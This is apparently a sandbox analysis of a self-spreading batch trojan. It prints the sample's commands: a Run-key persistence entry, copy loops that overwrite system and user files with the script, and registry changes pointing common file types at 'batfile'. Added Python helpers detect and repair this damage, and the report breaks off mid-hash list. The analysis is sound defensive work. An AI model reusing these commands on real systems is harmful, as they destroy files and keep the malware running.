File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_de-de_c2bbc1ff4b155b96\Report.System.Summary.xml | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.19041.1266_none_eb6597ac99d11603\f\audiodg.exe | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-shell-previewhost_31bf3856ad364e35_10.0.19041.1_none_f92e72a6a03c2c5a\prevhost.exe | cmd.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-t..peech-de-de-onecore_31bf3856ad364e35_10.0.19041.1_none_9703b402e16fe292\tokens_TTS_de-DE_hedda.xml | cmd.exe
File created | C:\Windows\Provisioning\IccidToRegion.xml | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..iencehost.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_52fbb1b86a870614\f\AppxManifest.xml | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.19041.746_none_afaafac6b02c16fa\ja-jp-sym.xml | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\serviceworkericon.png | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-a..gement-uevtemplates_31bf3856ad364e35_10.0.19041.1_none_0d66b54875835a49\MicrosoftInternetExplorer2013Backup.xml | cmd.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\Square71x71Logo.scale-150.png | cmd.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.19041.153_none_f3a9dc0fe254a157\DMR_48.png | cmd.exe
File created | C:\Windows\servicing\Sessions\31162705_200277395.back.xml | cmd.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\images\AccountLogo.png | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-s..kerplugin.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_23f4c1602d97fe43\r\AppxBlockMap.xml | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-t..nputpersonalization_31bf3856ad364e35_10.0.19041.746_none_1da55dc225237a0d\ipsdan.xml | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-s..mpropertieshardware_31bf3856ad364e35_10.0.19041.1_none_f6eb92c37257e103\SystemPropertiesHardware.exe | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.844_none_d9eb415c5b9dbe4e\BadgeLogo.contrast-white_scale-100.png | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\WiFiNetworkManagerToast.scale-150_contrast-black.png | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_it-it_f8576122041e54e0\Report.System.Network.xml | cmd.exe
File created | C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.19041.1266_none_4621ad58d5f654dd\Robocopy.exe | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..ets.icons.searchapp_31bf3856ad364e35_10.0.19041.1_none_ceba36fd1b479c4c\WideTile.scale-150.png | cmd.exe
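Every entry in the file list above is cmd.exe creating or modifying a system file, which is what the copy loops in the process tree produce: each .exe, .png, .xml (and so on) enumerated on the volume is overwritten with the batch file itself. After such a run the question for incident response is which files were clobbered, and the answer is every file whose contents now hash to the dropped .bat. The helper below is an added example, not part of the sandbox report or the sample; it sweeps a tree, skips files whose size cannot match (copy /y preserves the source size), and hashes the rest. The directory layout and the stand-in payload are constructed for the demo; on a real host, point sweep() at the volume root with the SHA-256 of the recovered .bat.

```python
"""Find files whose contents are the dropped batch file, i.e. the targets a
'copy /y <bat> <victim>' loop overwrote. Added example; the tree and payload
below are constructed, not taken from the report."""
import hashlib
import os
import tempfile
from typing import Dict, List, Optional, Set, Tuple

# Constructed stand-in for the dropped .bat; use the real file's hash on a host.
PAYLOAD = b"@echo off\r\nrem constructed stand-in for the dropped .bat\r\n"


def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 so large binaries do not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root: str, known_hashes: Set[str], size_hint: Optional[int] = None) -> List[str]:
    """Return every path under root whose SHA-256 is in known_hashes.
    size_hint lets the sweep skip hashing files of the wrong size, which is
    safe here because copy preserves the source file's length."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if size_hint is not None and os.path.getsize(path) != size_hint:
                    continue
                if sha256_of(path) in known_hashes:
                    hits.append(path)
            except OSError:
                continue  # unreadable or removed while walking; keep going
    return sorted(hits)


def build_demo_tree() -> Tuple[str, List[str]]:
    """Constructed sample tree: two files replaced by the payload, two genuine
    files (one deliberately the same size as the payload to exercise the
    size filter without producing a false positive)."""
    root = tempfile.mkdtemp(prefix="bat_sweep_demo_")
    layout: Dict[str, bytes] = {
        "Windows/WinSxS/x/prevhost.exe": PAYLOAD,
        "Windows/Provisioning/IccidToRegion.xml": PAYLOAD,
        "Users/Admin/notes.txt": b"genuine text, never touched\r\n",
        "Users/Admin/photo.png": b"\x89PNG\r\n\x1a\n" + bytes(len(PAYLOAD) - 8),
    }
    expected = []
    for rel, data in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
        if data == PAYLOAD:
            expected.append(path)
    return root, sorted(expected)


def demo() -> bool:
    """True when the sweep finds exactly the overwritten files in the demo tree."""
    root, expected = build_demo_tree()
    digest = hashlib.sha256(PAYLOAD).hexdigest()
    return sweep(root, {digest}, size_hint=len(PAYLOAD)) == expected


if __name__ == "__main__":
    print("sweep found exactly the overwritten files:", demo())
```

Files under C:\Windows\WinSxS and C:\Windows\SystemApps are component-store copies, so a hit there is best repaired with DISM /RestoreHealth and sfc /scannow after the persistence entry is removed, rather than by hand.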
Modifies registry class 18 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "batfile" | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile" | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile" | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "batfile" | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.png\ = "batfile" | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.doc | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3 | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4 | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile" | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\ = "batfile" | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile" | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.png | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.xml | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.xml\ = "batfile" | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf | cmd.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.txt | cmd.exe
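The registry writes above point the machine-wide default ProgID for .lnk, .pdf, .mp3, .exe, .png, .doc, .mp4, .txt and .xml at "batfile". Explorer resolves a double-click through that ProgID, so any file with one of those extensions is now opened by cmd.exe as a batch script; since the same sample overwrites those files with its own contents, every clobbered document becomes a relaunch of the malware. The block below is an added example, not part of the report: it parses the report's "Set value (str)" lines into an extension-to-ProgID map, flags extensions mapped to a script-host ProgID they should not have, and emits cmd.exe assoc lines for the extensions whose Windows 10 default is known. The sample lines are taken from the table above plus two constructed benign controls; DEFAULT_PROGIDS is an assumed baseline that should be replaced with values read from a known-good host, and read_live_associations() is only exercised on Windows.

```python
"""Detect and undo file-association hijacks of the kind in the report above.
Added example, not the sandbox's or the sample's code."""
import re
from typing import Dict, Iterable, List

# ProgIDs whose open verb hands the file to a script interpreter (lowercase
# for comparison; registry ProgIDs are case-insensitive).
SCRIPT_PROGIDS = {"batfile", "cmdfile", "vbsfile", "vbefile", "jsfile", "jsefile",
                  "wsffile", "wshfile", "microsoft.powershellscript.1"}

# Extensions that legitimately map to a script ProgID.
SCRIPT_EXTENSIONS = {".bat": "batfile", ".cmd": "cmdfile", ".vbs": "vbsfile",
                     ".vbe": "vbefile", ".js": "jsfile", ".jse": "jsefile",
                     ".wsf": "wsffile", ".wsh": "wshfile",
                     ".ps1": "microsoft.powershellscript.1"}

# Assumed Windows 10 defaults; .pdf/.mp3/.mp4/.doc depend on installed apps,
# so they are deliberately absent and must come from a clean host.
DEFAULT_PROGIDS = {".exe": "exefile", ".txt": "txtfile", ".lnk": "lnkfile",
                   ".xml": "xmlfile", ".png": "pngfile"}

# Matches the sandbox's 'Set value (str) \REGISTRY\...\Classes\.ext\ = "ProgID"' lines.
_SET_VALUE = re.compile(
    r'Set value \(str\) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\(\.[A-Za-z0-9]+)\\ = "([^"]*)"'
)

# Four lines copied from the report, two constructed benign controls.
SAMPLE_IOC_LINES = [
    'Key created \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.lnk cmd.exe',
    'Set value (str) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.lnk\\ = "batfile" cmd.exe',
    'Set value (str) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.pdf\\ = "batfile" cmd.exe',
    'Set value (str) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.exe\\ = "batfile" cmd.exe',
    'Set value (str) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.txt\\ = "batfile" cmd.exe',
    'Set value (str) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.bat\\ = "batfile" cmd.exe',  # constructed control
    'Set value (str) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.png\\ = "pngfile" cmd.exe',  # constructed control
]


def parse_class_ioc_lines(lines: Iterable[str]) -> Dict[str, str]:
    """Extension -> default ProgID, as recorded in the sandbox IoC lines."""
    assoc: Dict[str, str] = {}
    for line in lines:
        m = _SET_VALUE.search(line)
        if m:
            assoc[m.group(1).lower()] = m.group(2)
    return assoc


def hijacked_associations(assoc: Dict[str, str]) -> List[str]:
    """Extensions whose handler is a script ProgID that is not their own."""
    return sorted(ext for ext, progid in assoc.items()
                  if progid.lower() in SCRIPT_PROGIDS
                  and SCRIPT_EXTENSIONS.get(ext.lower()) != progid.lower())


def remediation_commands(hijacked: Iterable[str], baseline: Dict[str, str] = DEFAULT_PROGIDS) -> List[str]:
    """cmd.exe 'assoc' lines (run elevated) for extensions with a known baseline;
    extensions outside the baseline need a value captured from a clean host."""
    return [f"assoc {ext}={baseline[ext]}" for ext in hijacked if ext in baseline]


def read_live_associations(extensions: Iterable[str]) -> Dict[str, str]:
    """On Windows, read the HKLM\\SOFTWARE\\Classes\\<ext> default values;
    returns {} elsewhere so the module imports offline."""
    try:
        import winreg
    except ImportError:
        return {}
    assoc: Dict[str, str] = {}
    for ext in extensions:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\" + ext) as key:
                value, _kind = winreg.QueryValueEx(key, "")
                assoc[ext.lower()] = value
        except OSError:
            continue  # key or default value absent
    return assoc


if __name__ == "__main__":
    bad = hijacked_associations(parse_class_ioc_lines(SAMPLE_IOC_LINES))
    print("hijacked:", bad)
    print("\n".join(remediation_commands(bad)))
```

Two caveats when applying this to a live host: assoc writes the machine-wide key, but Explorer consults HKCU\Software\Classes and the per-user UserChoice entries under Explorer\FileExts first, so check those hives as well; and the report shows only the extension keys being changed, not the batfile ProgID itself, so restoring the extension defaults is the whole registry repair here.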
Suspicious use of WriteProcessMemory 50 IoCs
description | pid | Process | procid_target (each record is listed twice in the report)
PID 4980 wrote to memory of 1836 | 4980 | cmd.exe | 88 (x2)
PID 4980 wrote to memory of 2668 | 4980 | cmd.exe | 92 (x2)
PID 4980 wrote to memory of 4072 | 4980 | cmd.exe | 93 (x2)
PID 4980 wrote to memory of 3380 | 4980 | cmd.exe | 98 (x2)
PID 4980 wrote to memory of 3760 | 4980 | cmd.exe | 99 (x2)
PID 4980 wrote to memory of 3688 | 4980 | cmd.exe | 103 (x2)
PID 4980 wrote to memory of 2444 | 4980 | cmd.exe | 104 (x2)
PID 4980 wrote to memory of 116 | 4980 | cmd.exe | 105 (x2)
PID 4980 wrote to memory of 1372 | 4980 | cmd.exe | 106 (x2)
PID 4980 wrote to memory of 1836 | 4980 | cmd.exe | 108 (x2)
PID 4980 wrote to memory of 3936 | 4980 | cmd.exe | 109 (x2)
PID 4980 wrote to memory of 2352 | 4980 | cmd.exe | 111 (x2)
PID 4980 wrote to memory of 3424 | 4980 | cmd.exe | 112 (x2)
PID 4980 wrote to memory of 4268 | 4980 | cmd.exe | 115 (x2)
PID 4980 wrote to memory of 1292 | 4980 | cmd.exe | 116 (x2)
PID 4980 wrote to memory of 2240 | 4980 | cmd.exe | 117 (x2)
PID 4980 wrote to memory of 2020 | 4980 | cmd.exe | 118 (x2)
PID 4980 wrote to memory of 5012 | 4980 | cmd.exe | 120 (x2)
PID 4980 wrote to memory of 4668 | 4980 | cmd.exe | 121 (x2)
PID 4980 wrote to memory of 2340 | 4980 | cmd.exe | 123 (x2)
PID 4980 wrote to memory of 1216 | 4980 | cmd.exe | 124 (x2)
PID 4980 wrote to memory of 3576 | 4980 | cmd.exe | 126 (x2)
PID 4980 wrote to memory of 2052 | 4980 | cmd.exe | 127 (x2)
PID 4980 wrote to memory of 100 | 4980 | cmd.exe | 129 (x2)
PID 4980 wrote to memory of 2756 | 4980 | cmd.exe | 130 (x2)
Processes
- C:\Windows\system32\cmd.exe (level 1, PID 4980)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\reg.exe (level 2, PID 1836)
    Command line: reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_7188_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f
    - Adds Run key to start application
  - C:\Windows\system32\cmd.exe (level 2, PID 2668)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 4072)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  - C:\Windows\system32\cmd.exe (level 2, PID 3380)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 3760)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  - C:\Windows\system32\cmd.exe (level 2, PID 3688)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 2444)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  - C:\Windows\system32\cmd.exe (level 2, PID 116)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 1372)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (level 2, PID 1836)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 3936)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  - C:\Windows\system32\cmd.exe (level 2, PID 2352)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 3424)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in System32 directory
    - Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (level 2, PID 4268)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 1292)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in Program Files directory
  - C:\Windows\system32\cmd.exe (level 2, PID 2240)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 2020)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (level 2, PID 5012)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 4668)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in System32 directory
    - Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (level 2, PID 2340)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 1216)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (level 2, PID 3576)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 2052)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (level 2, PID 100)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (level 2, PID 2756)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
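The tree above has two detectable shapes. First, reg.exe adds the batch file to the HKLM Run key. Second, the parent cmd.exe spawns pairs of children: a `cmd /S /D /c" echo Y "` followed by a `cmd /S /D /c" FOR /F ... do copy /y <bat> "%j:%k""`, which is how cmd.exe executes the two sides of a pipe such as `echo Y | FOR ...`. Each loop reads one InfList_<ext>.txt (built outside the visible tree), splits every line at the first colon into a drive letter and a path, and copies the batch file over "%j:%k", so one parent produces one copy loop per extension, all with the same source file. The block below is an added example, not the sandbox's rules: it runs those two checks over process-creation records. The records are constructed from the command lines in the tree (the root's parent PID and the field names pid, ppid, image, cmdline are assumptions to map onto your own Sysmon or EDR schema), and MIN_LOOPS is a constructed threshold.

```python
"""Flag Run-key persistence and same-source copy loops in process telemetry.
Added example; records below are constructed from the report's command lines."""
import re
from collections import defaultdict
from typing import Dict, List

BAT = r"C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
CMD = r"C:\Windows\system32\cmd.exe"

# reg add to HKLM/HKCU ...\CurrentVersion\Run (long and short hive names).
RUN_KEY = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?hk(?:lm|cu|ey_local_machine|ey_current_user)'
    r'\\software\\microsoft\\windows\\currentversion\\run', re.I)
# A FOR /F loop whose body copies a fixed source file; group(1) is the source.
COPY_LOOP = re.compile(r'for\s+/f\b.*?\bdo\s+copy\s+/y\s+(\S+)', re.I)
MIN_LOOPS = 3  # constructed threshold: this many loops with one source under one parent


def _loop(listfile: str) -> str:
    """Shape of the copy-loop children in the report, one per InfList_<ext>.txt."""
    return (f'{CMD} /S /D /c" FOR /F "tokens=1,* delims=: " %j in ({listfile}) '
            f'do copy /y {BAT} "%j:%k""')


SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4980, "ppid": 1000, "image": CMD, "cmdline": f'{CMD} /c "{BAT}"'},  # ppid constructed
    {"pid": 1836, "ppid": 4980, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" '
                r'/v "rundll32_7188_toolbar" /t "REG_SZ" /d ' + BAT + " /f"},
    {"pid": 2668, "ppid": 4980, "image": CMD, "cmdline": f'{CMD} /S /D /c" echo Y "'},
    {"pid": 4072, "ppid": 4980, "image": CMD, "cmdline": _loop("InfList_doc.txt")},
    {"pid": 3380, "ppid": 4980, "image": CMD, "cmdline": f'{CMD} /S /D /c" echo Y "'},
    {"pid": 3760, "ppid": 4980, "image": CMD, "cmdline": _loop("InfList_lnk.txt")},
    {"pid": 3688, "ppid": 4980, "image": CMD, "cmdline": f'{CMD} /S /D /c" echo Y "'},
    {"pid": 2444, "ppid": 4980, "image": CMD, "cmdline": _loop("InfList_pdf.txt")},
    # Constructed benign control: one plain copy of a document, no loop.
    {"pid": 7001, "ppid": 7000, "image": CMD,
     "cmdline": f'{CMD} /c copy /y C:\\Users\\Admin\\report.docx D:\\backup\\'},
]


def detect(events: List[Dict]) -> Dict[str, list]:
    """Return Run-key writers and parents that fan out copy loops of one file."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[str, list] = {"run_key_persistence": [], "self_copy_loop": []}

    for e in events:
        if RUN_KEY.search(e["cmdline"]):
            findings["run_key_persistence"].append(e["pid"])

    # Group copy-loop children by (parent, source file).
    loops = defaultdict(list)
    for e in events:
        m = COPY_LOOP.search(e["cmdline"])
        if m:
            loops[(e["ppid"], m.group(1).lower())].append(e["pid"])

    for (ppid, src), pids in loops.items():
        if len(pids) < MIN_LOOPS:
            continue
        parent = by_pid.get(ppid)
        findings["self_copy_loop"].append({
            "parent": ppid,
            "source": src,
            "children": sorted(pids),
            # The copied file is the parent's own script: self-replication.
            "self_replicating": bool(parent) and src in parent["cmdline"].lower(),
        })
    return findings


if __name__ == "__main__":
    for name, hits in detect(SAMPLE_EVENTS).items():
        print(name, hits)
```

The echo Y halves are not matched on purpose: on their own they are noise, and the loop children carry the signal. Treat a self_replicating hit as a wiper-style event and go straight to scoping which files were overwritten, since the Run-key entry only matters once the host has been cleaned.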
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 34KB
  MD5: 4a812cb3bddc8bd1d63252fb8c483b9b
  SHA1: 7afeabf10ba2994cd8a69cd6ce0d574e9c78d797
  SHA256: 7deab1b703f5b0a5276ebc7b6c6431754f48608b514af206a2d235bf873a585a
  SHA512: 8917df6652689e936a55082fe8ace70c415c482a3ece37890c54933ec351e355152ec234fcace948003455ac05c987933f8882cd0e925efb6a602160529d6cc1
- C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml
  Filesize: 34KB
  MD5: 27aee8043f5ffe3f0f667e28b8879502
  SHA1: ec106279a6f518dbad09d70721c3cdf20874975c
  SHA256: acd484b2714e2385feb36052c6c3197933c413a902dd705dea69d22e79e94da6
  SHA512: 0cb9e46a93fb05902a8652462f159a2fce4e1a1922a1a10d054303156cbb6a55047bf39640af8f61b4f63aa42d8b68b4dc12038b2b0c864d8f5886407005a14b
- Filesize: 1KB
  MD5: 031e426c853451490b60ffeb2fd13539
  SHA1: d11935f2872953ef19aa7f1dfbaba0c9954b205f
  SHA256: aded8bf1652629e4d75e7baa4bb6963cb42baf5f67265a8551d22c34908416e9
  SHA512: e832312b0360cb3eebd19bec7a8ff85666ba497b512e7baf26766c4337b1d4df825de6a69f0d44924502576b0cb4113c36ad62b9bf15545d5b56d661d63ebc19
- Filesize: 541KB
  MD5: 3dd26776185fd8fe211ed70a11cfe4b0
  SHA1: 89617456aac9747cbf679c83ac08a9977aa604ff
  SHA256: a30d14f22e5d3e9dd80dfd8133b7d01a39131a52a9e003876b66c1d3bdf59e6b
  SHA512: 75ae6ad9a278264e8a626e7ad295decca80c2db46a33da603feddf4431fda82683ddc15fc9c71f70f5763e791e96b3f73efe4f9e445eb4ae7a283ec575b91328
- Filesize: 41KB
  MD5: 025b071cf5ff7d1bcaf8d6a758b4b974
  SHA1: b55c871a42df668b1f07e3d214bed009ca0c8a23
  SHA256: 495c90bbe6555aaf7506ad493b6617580cce8e775652a43a91aef8248b8ba871
  SHA512: fca0efa69f8ffc07b6ecb3f3f64fecc727794055af27cd70b44d6409f573e653ae2a0df4ac3ba2c83e0da1be813530b12680fb24a7215dce4540520b93e248f8
- Filesize: 160B
  MD5: f149377191b51abb3c0514f5a8c87573
  SHA1: 9533737585b0369533681b025d654178016d4502
  SHA256: 605d1f5cf8501e16bba22d417749da9319bd7602487913a0cabea85346082b01
  SHA512: 6a71fc943b77c442cff1c4c4e8d73a1d8a5a4e2ba4442ca7ff38f1dbf115abd16548a08bcb208b92a399207343ec9c3c0a4d6407dc040ad4203de6faaacc66fd
- Filesize: 2KB
  MD5: 199dc21ff9bc7a3174c71540f4a17cf8
  SHA1: 93d5af17642721ea491004362ca84b08aaffab3d
  SHA256: 7cc4e699bd1e12f2f60613adf4e395f72b122ce6f79155574bbc8df255ce607c
  SHA512: 363d1757410e50d1b9a555e72c16fda613bd5bbddf9f19fb37f613bf53cb8a8c0abc64a936dd102190befdb5ec3cd2a152255250961389b4d2d0b1e8bbbc03ec
- Filesize: 2KB
  MD5: 57727573e27460e5daa9445ddd95a541
  SHA1: d14cd5d4a9d6e27a02003ee095e4f9b3e587ed62
  SHA256: 4df68c1fba81b1cf329b4e08610be2a95279b9d9d9a70ec842cdd1ac4d61fc72
  SHA512: 38d5cd7b4f818f04a7b93adf5aac17582fd356b2541e2fea8b41180aae82c082025e8b3a22b5225dc55aa07f529e6e8e8b4d1bfc8d61aef4d89ab56fb9ab08fa
- Filesize: 1.7MB
  MD5: 82eb38622551dbe5027277caba1886d3
  SHA1: e3858d1f6d0858ecb87a6db3233051db1143eee7
  SHA256: 7a368f27fd8555b81c08f1f5c2c9455bc4492cd680451fd9b7e4068cb19f9333
  SHA512: 80d7c1b0d44287ed6ea5847fad0d13b64d57bc550168a1ab3b9aae29f0a423d69059bc802283dfe37efd6759d45aca9bcd66cbfe5c24e329227555bd546bee4e
- Filesize: 43KB
  MD5: e311dc2921ff2679e7a536347824d01a
  SHA1: ee55fb3719de270875485e0c51e1207fd86e5676
  SHA256: e6ae9adaba9bf85c2b95589f37547dfd8b13ceba4c0f05ca5c6c1c7edbc5b8f1
  SHA512: 9f7c66ac5d43bda54a2d6a6bcfe1e77f9ce0821235ba1257de4c4c2f9d5c17b82708094190e5a97a3972512c49f78e148141a49330c84d004df699f46bdef8d7
- Filesize: 349KB
  MD5: 8bbe092c147ea3c9cf1af49b4adc316e
